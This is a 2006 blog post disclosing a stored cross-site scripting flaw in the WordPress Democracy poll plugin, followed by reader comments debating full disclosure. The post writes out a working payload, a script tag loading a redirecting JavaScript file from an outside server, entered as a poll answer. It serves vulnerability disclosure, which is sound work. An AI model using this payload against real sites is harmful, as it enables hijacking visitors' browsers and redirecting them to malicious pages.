• Technosailor.com
  • Desk of the Editor
  • Venture Files
  • Tech Policy
  • Contenido Español
Technosailor
  • Authors
  • Disclosures
Sep
22
2006

Democracy Plugin XSS Vulnerability ALERT

Posted by: Aaron Brazell

Last week, Darren McLaughlin scooped a story regarding the very popular Democracy plugin for Wordpress. You can read his findings about how the execution of the plugin may cause all of your sites pages to be dropped from search engine indexes.

When it rains it pours because last week, we discovered an XSS exploit in the plugin that can cause a website to be hijacked. To be clear, we discovered this because one of our b5media blogs was in fact hijacked. While in our case, the hack was not malicious and actually redirected the site to Google, the truth is that by exploiting this plugin, a malicious hacker could redirect a website to any website that could execute any malicious code and compromise security. It affects btoh Firefox and Internet Explorer. PLEASE TAKE THIS WARNING SERIOUSLY!

I have alerted the plugin author who has responded positively and promises a new version of Democracy 2.0, however I warned him that he had one week until I released details of the exploit. Andrew has just posted Democracy Public Beta 2. Cannot vouch for its security yet as it has literally just now been posted. Prelimnary testing indicates it’s okay though.

How To Exploit the Democracy 1.2 XSS Vulnerability

This is not a complex exploit.

I have created a javascript file called examplehack.js and placed it on my webserver. It simply redirects to a standard HTML page with a message. This could be any page containing any scripting.


window.location = "http://www.technosailor.com/examplehack.html"

To exploit the plugin, the blog owner must have a poll that allows user contributed answers. Simply “Adding an answer” with the following code (sample) will create a hijacked browser: <script src=http://technosailor/examplehack.js>test</script>

poll.png

Refresh and watch traffic get siphoned away.

Originally discovered by Duncan Riley.

  • Add to Mixx!
  • Stumble it!
About the Author: Aaron Brazell is the lead editor of Technosailor.com and a social media expert. His passion is to see companies and individuals use the internet and web technologies wisely and effectively to promote their brands and companies. He is Business Development Manager for Lijit and he worked as Director of Technology at b5media from 2005-2008 and is currently an independent consultant.
Tagged: at 7:00 pm -
discussion by DISQUS

Add New Comment

  • Subscribe:  This Thread
  • Go to:  My Comments ·  Community Page
    • Sort thread by:

    Viewing 15 Comments

    Thanks. Your comment is awaiting approval by a moderator.

    Do you already have an account? Log in and claim this comment.

      • ^
      • v
      • Permalink
      • Admin
        • Remove Post
        • Block email
        • Block IP address
      podz 2 years ago 1 point

      Please login to rate.

      Do you already have an account? Log in and claim this comment.

      I'm curious - why post the actual exploit?
      Is it to prove it's existence?
      reply  edit  flag   record video comment
      http://tamba2.org.uk/T2 /people/11aaad44423a3262c27b6b3c3d4b53f9/
      • ^
      • v
      • Permalink
      • Admin
        • Remove Post
        • Block email
        • Block IP address
      Aaron Brazell 2 years ago 1 point

      Please login to rate.

      Do you already have an account? Log in and claim this comment.

      Hey podz-

      Most people tend to think, "Aww, a hack will never happen to me". The point of this exercise was to demonstrate how very simple it is. Maybe demonstration will cause folks to be cautious regarding plugins they use.
      reply  edit  flag   record video comment
      http://www.technosailor.com/the-technosailor/ /people/d409f7e3d0b43dd41dcfbd58aa255601/
      • ^
      • v
      • Permalink
      • Admin
        • Remove Post
        • Block email
        • Block IP address
      podz 2 years ago 1 point

      Please login to rate.

      Do you already have an account? Log in and claim this comment.

      But I could now google enough to find that plugin and hit those sites in a couple of clicks.
      Surely just saying what you have and omitting the actual exploit would be the way to go?
      reply  edit  flag   record video comment
      http://tamba2.org.uk/T2 /people/11aaad44423a3262c27b6b3c3d4b53f9/
      • ^
      • v
      • Permalink
      • Admin
        • Remove Post
        • Block email
        • Block IP address
      Darren McLaughlin 2 years ago 1 point

      Please login to rate.

      Do you already have an account? Log in and claim this comment.

      These plugins can be very dangerous. I think the Wordpress culture is to install as many plugins as possible without doing a ton of research.

      This one is a very insidious exploit.
      reply  edit  flag   record video comment
      http://www.blog-republic.com /people/b7492916c29fa99cfe5a14506d3b5fae/
      • ^
      • v
      • Permalink
      • Admin
        • Remove Post
        • Block email
        • Block IP address
      Jeremy Wright 2 years ago 1 point

      Please login to rate.

      Do you already have an account? Log in and claim this comment.

      pods: posting the exploit is standard practice, whether it's Microsoft or Apache.
      reply  edit  flag   record video comment
      http://www.b5media.com /people/2d52cee66fc6d0b83d5c723007f4fcea/
      • ^
      • v
      • Permalink
      • Admin
        • Remove Post
        • Block email
        • Block IP address
      Aaron Brazell 2 years ago 1 point

      Please login to rate.

      Do you already have an account? Log in and claim this comment.

      Sure. And you could also subscribe to bugtraq and find this same kind of information numerous times a day. Secrecy is not always the best policy. I don't make a habit of reporting exploits but I read blogs everyday that do. It's quite the same thing.
      reply  edit  flag   record video comment
      http://www.technosailor.com/the-technosailor/ /people/d409f7e3d0b43dd41dcfbd58aa255601/
      • ^
      • v
      • Permalink
      • Admin
        • Remove Post
        • Block email
        • Block IP address
      Duncan 2 years ago 1 point

      Please login to rate.

      Do you already have an account? Log in and claim this comment.

      No link love for the person who actually discovered it? :-)
      reply  edit  flag   record video comment
      http://www.duncanriley.com /people/f29c1c44f0c43207f87cd00ae8768bf9/
      • ^
      • v
      • Permalink
      • Admin
        • Remove Post
        • Block email
        • Block IP address
      Aaron Brazell 2 years ago 1 point

      Please login to rate.

      Do you already have an account? Log in and claim this comment.

      Sure, over here. ;)
      reply  edit  flag   record video comment
      http://www.technosailor.com/the-technosailor/ /people/d409f7e3d0b43dd41dcfbd58aa255601/
      • ^
      • v
      • Permalink
      • Admin
        • Remove Post
        • Block email
        • Block IP address
      drmike 2 years ago 1 point

      Please login to rate.

      Do you already have an account? Log in and claim this comment.

      Podz: Don't forget all those people over on the wp.com forums who keep saying that javascripts, embed, and object tags are safe as well. :)
      reply  edit  flag   record video comment
      http://tdjc.be /people/37faf8a9cd19c315b1098a251afff89c/
      • ^
      • v
      • Permalink
      • Admin
        • Remove Post
        • Block email
        • Block IP address
      podz 2 years ago 1 point

      Please login to rate.

      Do you already have an account? Log in and claim this comment.

      drmike - I wasn't saying they were safe. I'm talking about people who can code saying that other code is unsafe.

      I've a challenge. If it will be accepted.
      reply  edit  flag   record video comment
      /people/10d1d26e1bd99fdac3de3c04b7655d1d/
      • ^
      • v
      • Permalink
      • Admin
        • Remove Post
        • Block email
        • Block IP address
      Leroy Brown 2 years ago 1 point

      Please login to rate.

      Do you already have an account? Log in and claim this comment.

      It's a shame that it always takes the public posting of the exploit for the author to fix the problem. Although I can't be too hard on someone who creates a plugin at no cost, so I don't know. Mixed feelings as usual.
      Can you hold the author liable for any problems, even though his software is free? I'm not sure that it's fair to do so.
      reply  edit  flag   record video comment
      http://www.bloggingblog.net/ /people/2b4ad94c020e2c6a99e2ede379eb4d01/
      • ^
      • v
      • Permalink
      • Admin
        • Remove Post
        • Block email
        • Block IP address
      Aaron Brazell 2 years ago 1 point

      Please login to rate.

      Do you already have an account? Log in and claim this comment.

      Leroy: Technically, no you can't hold an author liable. In reality though, he's liable. That's how anyone who would get exploited would feel. That's how I would feel if I was hacked as a result. Fortunately, I was able to post the exploit with a link to a new version, so I'd like to think that I worked with Andrew to find a solution before it blew up.
      reply  edit  flag   record video comment
      http://www.technosailor.com/the-technosailor/ /people/d409f7e3d0b43dd41dcfbd58aa255601/
      • ^
      • v
      • Permalink
      • Admin
        • Remove Post
        • Block email
        • Block IP address
      Leroy Brown 2 years ago 1 point

      Please login to rate.

      Do you already have an account? Log in and claim this comment.

      Aaron,
      I may feel differently if one of my sites had been hacked - that'll certainly give you a different perspective on the matter. Either way, it's necessary to post the expoit so that a fix can be produced, whether by the author or someone else. Good to see that the author did come up with a fix, so that people had a solution instead of a freak-out period of waiting.
      reply  edit  flag   record video comment
      http://www.bloggingblog.net/ /people/2b4ad94c020e2c6a99e2ede379eb4d01/
      • ^
      • v
      • Permalink
      • Admin
        • Remove Post
        • Block email
        • Block IP address
      MustLive 2 years ago 1 point

      Please login to rate.

      Do you already have an account? Log in and claim this comment.

      Aaron. As I wrote at my site http://websecurity.com.ua/187/ two weeks ago, I was found a vulnerability in Subscribe To Comments WordPress plugin (and already released the path and plugin developer also worked on next version of plugin). So there are many other cases (among WordPress plugins) with plugin's vulnerabilities, not only in Democracy plugin. And as I see, you also use Subscribe To Comments at your site, so you need to draw attention to this information (and check your plugin).
      reply  edit  flag   record video comment
      http://websecurity.com.ua /people/997a9fa55e557e2aa8262a07758b161d/
      • ^
      • v
      • Permalink
      • Admin
        • Remove Post
        • Block email
        • Block IP address
      MustLive 2 years ago 1 point

      Please login to rate.

      Do you already have an account? Log in and claim this comment.

      Aaron. You have already validated my message and then I retrieved my "key" (it need for your version of wp-subscription-manager.php). And after looking to one of the vulnerable scripts (in this case - wp-subscription-manager.php), I can tell you that your site is vulnerable (via Subscribe To Comments plugin)!

      You need to update plugin. You can take Subscribe To Comments 2.0.5 from my MustLive Security Pack v.1.0.4 or download last version (Subscribe To Comments 2.0.8) from developer's site.
      reply  edit  flag   record video comment
      http://websecurity.com.ua /people/997a9fa55e557e2aa8262a07758b161d/
    discussion by DISQUS

    Add New Comment

    close Joe Chill(joechill)
    konvict

    status via twitter

    Murdering the Wayne parents, creating Batman · 2 minutes ago

    recent comments (follow comments)

      View Profile »
      Powered by Disqus · Learn more
      blog comments powered by Disqus
      Powered by Defender Hosting
      Freshbooks

      • Recent Posts

        • Get a Management System — Now
        • Hints at an $800 Apple laptop, Bloggers Report, Stock up 4 points
        • Internet 2.0, Suck it Up and Lead
        • It’s the Economy, Stupid
        • Startups Need Management, Too

      • Recent Comments

        Powered by Disqus

      • Tags

        Aaron Brazell Advertising Apple b5media Blogging book conferences Design entrepreneurship Facebook Finance and Funding Google guest_blogging holidays humor hurricanes_and_natural_disasters interesting job Links Marketing Music nfl Op-Ed Perfect Pitch personal politics pr Predictions productivity Programming Security Social Issues Social Media Social Networking social_issues Sports Tech Industry Technology Technosailor Travel twitter unix Venture Files WordPress you_can_blog

      • License Creative Commons Attribution-Noncommercial-Share Alike 3.0 | Copyright © 2004 - 2008 - Aaron Brazell | Lisa helped out | Privacy Policy